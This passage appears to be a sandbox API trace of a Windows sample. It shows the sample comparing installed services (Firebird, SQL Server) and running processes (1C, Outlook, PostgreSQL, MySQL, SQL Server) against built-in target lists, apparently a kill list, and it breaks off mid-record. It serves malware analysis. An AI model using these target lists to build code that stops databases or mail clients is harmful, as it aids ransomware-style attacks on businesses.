[0267.646] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0267.646] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0267.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0267.646] lstrlenW (lpString="Power") returned 5 [0267.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0267.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0267.646] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0267.646] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0267.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0267.646] lstrlenW (lpString="ProfSvc") returned 7 [0267.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0267.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0267.646] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0267.646] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0267.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0267.646] lstrlenW (lpString="RpcEptMapper") returned 12 [0267.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0267.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0267.646] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0267.646] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0267.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0267.646] lstrlenW (lpString="RpcSs") returned 5 [0267.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0267.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0267.647] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0267.647] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0267.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0267.647] lstrlenW (lpString="SamSs") returned 5 [0267.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0267.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0267.647] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0267.647] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0267.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0267.647] lstrlenW (lpString="Schedule") returned 8 [0267.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0267.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0267.647] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0267.647] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0267.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0267.647] lstrlenW (lpString="SENS") returned 4 [0267.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0267.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0267.647] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0267.647] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0267.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0267.647] lstrlenW (lpString="ShellHWDetection") returned 16 [0267.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0267.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0267.647] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0267.647] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0267.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0267.647] lstrlenW (lpString="Spooler") returned 7 [0267.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0267.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0267.647] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0267.647] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0267.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0267.647] lstrlenW (lpString="Themes") returned 6 [0267.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0267.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0267.648] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0267.648] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0267.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0267.648] lstrlenW (lpString="UxSms") returned 5 [0267.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0267.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0267.648] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0267.648] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0267.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0267.648] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x652bd0 | out: hHeap=0x5e0000) returned 1 [0267.648] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x138 [0267.649] Process32FirstW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.649] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0267.650] lstrlenW (lpString="System") returned 6 [0267.650] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0267.650] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0267.650] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0267.650] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0267.650] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0267.650] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0267.650] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0267.650] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0267.650] lstrlenW (lpString="smss.exe") returned 8 [0267.650] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0267.650] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0267.650] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0267.650] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0267.650] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0267.650] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0267.650] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0267.650] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.651] lstrlenW (lpString="csrss.exe") returned 9 [0267.651] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0267.651] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0267.651] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0267.651] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0267.651] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0267.651] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0267.651] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0267.651] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0267.651] lstrlenW (lpString="wininit.exe") returned 11 [0267.651] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0267.651] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0267.651] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0267.651] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0267.651] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0267.651] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0267.651] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0267.651] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.652] lstrlenW (lpString="csrss.exe") returned 9 [0267.652] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0267.652] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0267.652] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0267.652] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0267.652] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0267.652] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0267.652] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0267.652] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0267.652] lstrlenW (lpString="winlogon.exe") returned 12 [0267.652] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0267.652] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0267.652] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0267.652] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0267.652] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0267.652] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0267.652] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0267.652] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0267.652] lstrlenW (lpString="services.exe") returned 12 [0267.652] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0267.652] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0267.653] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0267.653] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0267.653] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0267.653] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0267.653] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0267.653] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0267.653] lstrlenW (lpString="lsass.exe") returned 9 [0267.653] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0267.653] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0267.653] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0267.653] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0267.653] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0267.653] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0267.653] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0267.653] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0267.653] lstrlenW (lpString="lsm.exe") returned 7 [0267.653] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0267.653] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0267.653] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0267.653] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0267.653] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0267.654] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0267.654] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0267.654] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.654] lstrlenW (lpString="svchost.exe") returned 11 [0267.654] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.654] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.654] lstrlenW (lpString="svchost.exe") returned 11 [0267.654] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.654] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.655] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.655] lstrlenW (lpString="svchost.exe") returned 11 [0267.655] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.655] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.655] lstrlenW (lpString="svchost.exe") returned 11 [0267.655] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.655] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.655] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.656] lstrlenW (lpString="svchost.exe") returned 11 [0267.656] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.656] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.656] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.656] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.656] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.656] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.656] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.656] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0267.656] lstrlenW (lpString="audiodg.exe") returned 11 [0267.656] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0267.656] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0267.656] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0267.656] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0267.656] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0267.656] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0267.656] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0267.656] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.657] lstrlenW (lpString="svchost.exe") returned 11 [0267.657] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.657] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.657] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.657] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.657] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.657] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.657] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.657] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0267.657] lstrlenW (lpString="userinit.exe") returned 12 [0267.657] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0267.657] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0267.657] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0267.657] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0267.657] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0267.657] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0267.657] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0267.657] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0267.658] lstrlenW (lpString="explorer.exe") returned 12 [0267.658] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0267.658] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0267.658] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0267.658] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0267.658] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0267.658] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0267.658] lstrlenW (lpString="dwm.exe") returned 7 [0267.658] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.658] lstrlenW (lpString="svchost.exe") returned 11 [0267.658] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0267.659] lstrlenW (lpString="ivttvf.exe") returned 10 [0267.659] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0267.659] lstrlenW (lpString="spoolsv.exe") returned 11 [0267.659] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0267.659] lstrlenW (lpString="cmd.exe") returned 7 [0267.659] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.659] lstrlenW (lpString="svchost.exe") returned 11 [0267.659] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0267.660] lstrlenW (lpString="conhost.exe") returned 11 [0267.660] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0267.660] lstrlenW (lpString="taskhost.exe") returned 12 [0267.660] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0267.660] lstrlenW (lpString="reader_sl.exe") returned 13 [0267.660] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0267.660] lstrlenW (lpString="dllhost.exe") returned 11 [0267.661] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x540, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0267.661] lstrlenW (lpString="mode.com") returned 8 [0267.661] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x540, pcPriClassBase=8, dwFlags=0x0, 